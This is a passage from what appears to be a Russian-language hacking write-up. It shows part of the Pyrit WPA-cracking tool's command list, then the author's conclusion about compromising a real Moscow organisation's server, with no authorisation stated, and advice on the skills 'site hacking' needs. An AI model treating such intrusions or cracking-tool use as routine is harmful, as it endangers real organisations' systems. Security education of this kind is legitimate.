  import_unique_passwords : Импортировать уникальные пароли из файлоподобного источника
  list_cores              : Список доступных ядер
  list_essids             : Список всех ESSIDs, но не подсчитывать соответствующие результаты
  passthrough             : Расчитать PMKs и записать результаты в файл
  relay                   : Передавать URL хранилища черзе RPC
  selftest                : Тестировать железо, чтобы убедиться, что оно считает корректные результаты
  serve                   : Превратить локально железо в сервер для других клиетов Pyrit 
  strip                   : Очистить файлы захваченных пакетов до релевантных пакетов
  stripLive               : Захватить релевантные пакеты из живого источника захвата
  verify                  : Верифицировать 10% результата путём повторных вычислений

Заключение

Вы можете подумать, что этот рассказ — это просто перечисление всех самых детских и самых нелепых ошибок, которые только могут допустить начинающие школьник-программист и администратор. Мол в реальной-то жизни такого не бывает. Бывает… Это абсолютно реальный разбор, реального сервера.

К сожалению, не могу даже в общих чертах сказать о контексте этого случая. Но факт в том, что организация, которой принадлежит этот сервер, находится в Москве и у неё не без оснований на стене висит большой триколор.

Вы можете обратить внимание, что я по минимуму использовал специализированные утилиты. Почти все «взломы» заключались в том, что я знал где и что нужно смотреть и просто это смотрел

Поэтому обучение аудиту безопасности сайтов (взлому сайтов), заключается не только в изучении специализированных утилит. В первую очередь нужно понимание происходящих процессов. Если мы говорим о сайтах, то должно быть понимание, как они функционируют. Я не могу себе представить, как можно делать тест на проникновение сайта, если нет умений по программированию на PHP и хоть какого-то опыта в создании сайтов и веб приложений (CMS, движков и прочего). Если пентестинг продолжается на сервере, то тут просто нечего делать без таких мирных профессиональных навыков как:

  • понимание работы сервера, умение его настраивать
  • понимание ОС Linux, её внутренного устройства
  • умение работать в командной строке и знание хотя бы самых ходовых команд (утилит) Linux
Ссылка на основную публикацию